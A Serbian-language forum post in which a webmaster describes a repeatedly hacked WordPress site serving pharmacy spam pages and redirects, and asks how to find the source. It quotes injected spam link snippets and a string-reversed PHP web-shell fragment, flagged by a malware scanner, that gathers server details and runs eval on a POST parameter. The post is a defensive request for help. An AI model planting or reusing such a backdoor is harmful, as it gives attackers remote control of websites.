Imam problem koji ne mogu da resim.
Preuzeo sam odrzavanje sajta koji je bio dva puta hakovan i Google ga je blokirao zbog toga; sajt je radjen u Wordpressu i kada sam proceprkao po njemu video sam dosta stranica koje postoje a ni jedan od dva prethodna administratora ih nije pravio kao npr.
"http://www.mojsajt.rs/sample-page/"
Poruka od WMToolsa je da postoji sumnjiv snippet
"small meals, 3 snacks daily <u><a href="http://www.mojsajt.rs/buy-ampi...mpicillin-category-ampicillin/">Buy Ampicillin In Us No Prescription Ampicillin</a></u>. "
"https://www.mojsajt.rs/vestibulum-semper-suscipit/"
"Usa No Prescription Clomid</a> | <a href="http://www.mojsajt.rs/buying-a...ount-prices-category-antabuse/">Buying Antabuse 500 On The Internet Discount Prices</a> "
Desava se kada se poseti sajt i klikne na neki od linkova stranica da prebaci na sajt 247.com ili slicno i nudi Vijagru, lekove bez recepta.......
Preko FTP-a sam fizicki obrisao sve te stranice koje su postojale a ne bi smele, Google cekirao sve i sve proslo, sajt odblokiran i onda odjednom se javlja jedan posetilac da mu iskace Vijagra opet.
Instalirao sam Anti-Malware from GOTMLS.NET i kada je pregledao svih 13.000 fajlova?!?! prijavio je da je stavio u karantin
".../public_html/wp-includes/functions.wp-date.php
.../public_html/wp-includes/class-wp-codex-cron.php"
i markirani kod koji je izbacio
";tixe
;)]'a'[TSOP_$ . 'noitca'(cnuf_resu_llac
) )]'a'[TSOP_$ . 'noitca'(stsixe_noitcnuf && )]'a'[TSOP_$(ytpme! (fi
;'ofnIceS' = ]'a'[TSOP_$
esle
;noitca_tluafed$ = ]'a'[TSOP_$
))noitca_tluafed$ . 'noitca'(stsixe_noitcnuf && )noitca_tluafed$(tessi(fi
) )]'a'[TSOP_$(ytpme (fi
}
}
;)]'1p'[TSOP_$(lave
{ esle }
;)a$(ezilaires ohce
;)
)'edom_efas'(teg_ini@ >= "edomefas"
,NOISREV_OSW >= "noisrev_osw"
,)(noisrevphp >= "noisrev_php"
,)(emanu_php >= "emanu"
(yarra = a$
{ )]'1p'[TSOP_$@!(fi
{ )(CRnoitca noitcnuf
}"
Kako da nadjem generator malware-a i eliminisem? Bilo kakvo iskustvo sa slicnim problemom ili predlog resenja.